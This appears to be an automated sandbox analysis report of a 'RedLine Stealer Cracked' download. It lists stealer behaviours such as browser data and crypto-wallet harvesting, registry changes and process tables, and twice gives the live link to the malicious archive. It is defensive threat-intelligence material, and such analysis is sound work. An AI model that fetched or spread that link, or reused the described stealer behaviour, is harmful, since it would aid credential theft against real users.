Analysis Overview
Threat Level: Known bad
The file https://zelenka.guru/proxy.php?link=https%3A%2F%2Fgofile.io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b2 was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
UPX packed file
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Enumerates processes with tasklist
Modifies data under HKEY_USERS
Kills process with taskkill
Suspicious use of SendNotifyMessage
Detects videocard installed
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Gathers system information
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-19 08:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-19 08:28
Reported
2024-05-19 08:31
Platform
win10v2004-20240426-en
Max time kernel
122s
Max time network
106s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI14082\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133605809500464844" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 8400310000000000b358bc431100444f574e4c4f7e3100006c0009000400efbe9a586d64b358bc432e00000074e101000000010000000000000000004200000000003ebe5a0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\NodeSlot = "5" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 = 5c0031000000000092572c7b10004c49425241527e310000440009000400efbeb358aa43b358bc432e00000025340200000008000000000000000000000000000000f2d410004c0069006200720061007200690065007300000018000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\MRUListEx = ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0 = 7800310000000000b358653a10005245444c494e7e310000600009000400efbeb358aa43b358bc432e000000bb3302000000120000000000000000000000000000009fdc8a005200650064004c0069006e006500200053007400650061006c0065007200200043007200610063006b0065006400000018000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 78003100000000009a586d641100557365727300640009000400efbe874f7748b358a3432e000000c70500000000010000000000000000003a000000000080152e0155007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 50003100000000009a58f36c100041646d696e003c0009000400efbe9a586d64b358a3432e0000006ce1010000000100000000000000000000000000000096ccd600410064006d0069006e00000014000000 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://zelenka.guru/proxy.php?link=https%3A%2F%2Fgofile.io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b2
C:\Program Files\Google\Chrome\Application\chrome.exe
